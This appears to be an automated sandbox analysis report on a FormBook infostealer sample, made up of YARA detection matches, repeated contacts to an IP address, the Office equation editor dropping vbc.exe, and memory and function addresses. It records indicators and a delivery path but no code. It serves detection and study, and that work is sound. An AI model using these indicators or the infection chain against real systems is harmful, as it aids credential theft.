Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: unknown TCP traffic detected without corresponding DNS query: 107.173.229.133
Source: explorer.exe, 0000000A.00000000.475187176.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495256072.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.466306106.0000000003456000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.660793447.00000000001D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.495227557.0000000000210000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.487261064.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E6310 4_2_001E6310
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E6300 4_2_001E6300
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1DE0 4_2_001E1DE0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00401030 9_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041C130 9_2_0041C130
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041C9A5 9_2_0041C9A5
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041BABE 9_2_0041BABE
Source: C:\Users\Public\vbc.exe Code function: 9_2_00408C7B 9_2_00408C7B
Source: C:\Users\Public\vbc.exe Code function: 9_2_0041C4E6 9_2_0041C4E6
Source: C:\Users\Public\vbc.exe Code function: 9_2_00408C80 9_2_00408C80
Source: C:\Users\Public\vbc.exe Code function: 9_2_00402D87 9_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 9_2_00402D90 9_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 9_2_00402FB0 9_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5E0C6 9_2_00C5E0C6
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C63040 9_2_00C63040
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C7905A 9_2_00C7905A
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CDD06D 9_2_00CDD06D
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C8D005 9_2_00C8D005
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CED13F 9_2_00CED13F
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5E2E9 9_2_00C5E2E9
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D01238 9_2_00D01238
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5F3CF 9_2_00C5F3CF
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C863DB 9_2_00C863DB
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D063BF 9_2_00D063BF
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C67353 9_2_00C67353
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CAA37B 9_2_00CAA37B
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C62305 9_2_00C62305
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C95485 9_2_00C95485
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C71489 9_2_00C71489
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C9D47D 9_2_00C9D47D
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE443E 9_2_00CE443E
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D035DA 9_2_00D035DA
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE05E3 9_2_00CE05E3
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C7C5F0 9_2_00C7C5F0
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CA6540 9_2_00CA6540
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6351F 9_2_00C6351F
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6E6C1 9_2_00C6E6C1
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C64680 9_2_00C64680
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D02622 9_2_00D02622
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CAA634 9_2_00CAA634
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C957C3 9_2_00C957C3
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE579A 9_2_00CE579A
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6C7BC 9_2_00C6C7BC
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CF771D 9_2_00CF771D
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CDF8C4 9_2_00CDF8C4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CFF8EE 9_2_00CFF8EE
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6C85C 9_2_00C6C85C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C8286D 9_2_00C8286D
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C769FE 9_2_00C769FE
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CF49F5 9_2_00CF49F5
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D0098E 9_2_00D0098E
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C629B2 9_2_00C629B2
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE394B 9_2_00CE394B
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE5955 9_2_00CE5955
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D13A83 9_2_00D13A83
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CE6BCB 9_2_00CE6BCB
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C5FBD7 9_2_00C5FBD7
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CEDBDA 9_2_00CEDBDA
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D0CBA4 9_2_00D0CBA4
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C87B00 9_2_00C87B00
Source: C:\Users\Public\vbc.exe Code function: 9_2_00D02C9C 9_2_00D02C9C
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CEAC5E 9_2_00CEAC5E
Source: C:\Users\Public\vbc.exe Code function: 9_2_00CFFDDD 9_2_00CFFDDD
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C6CD5B 9_2_00C6CD5B
Source: C:\Users\Public\vbc.exe Code function: 9_2_00C90D3B 9_2_00C90D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3E0C6 12_2_00A3E0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A6D005 12_2_00A6D005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A43040 12_2_00A43040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A5905A 12_2_00A5905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3E2E9 12_2_00A3E2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AE1238 12_2_00AE1238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3F3CF 12_2_00A3F3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A663DB 12_2_00A663DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A42305 12_2_00A42305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A8A37B 12_2_00A8A37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A47353 12_2_00A47353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A75485 12_2_00A75485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A51489 12_2_00A51489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A7D47D 12_2_00A7D47D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A5C5F0 12_2_00A5C5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4351F 12_2_00A4351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A86540 12_2_00A86540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A44680 12_2_00A44680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4E6C1 12_2_00A4E6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AE2622 12_2_00AE2622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4C7BC 12_2_00A4C7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AC579A 12_2_00AC579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A757C3 12_2_00A757C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00ADF8EE 12_2_00ADF8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A6286D 12_2_00A6286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4C85C 12_2_00A4C85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A429B2 12_2_00A429B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AE098E 12_2_00AE098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A569FE 12_2_00A569FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AC5955 12_2_00AC5955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AF3A83 12_2_00AF3A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00AECBA4 12_2_00AECBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A3FBD7 12_2_00A3FBD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00ACDBDA 12_2_00ACDBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A67B00 12_2_00A67B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00ADFDDD 12_2_00ADFDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A70D3B 12_2_00A70D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A4CD5B 12_2_00A4CD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A72E2F 12_2_00A72E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A5EE4C 12_2_00A5EE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A50F3F 12_2_00A50F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00A6DF7C 12_2_00A6DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_0009C9A5 12_2_0009C9A5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00088C7B 12_2_00088C7B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00088C80 12_2_00088C80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00082D87 12_2_00082D87
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00082D90 12_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 12_2_00082FB0 12_2_00082FB0
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Yara signature match
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.480207379.0000000009780000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.495167192.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.461391502.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.660761773.0000000000170000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.461058608.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
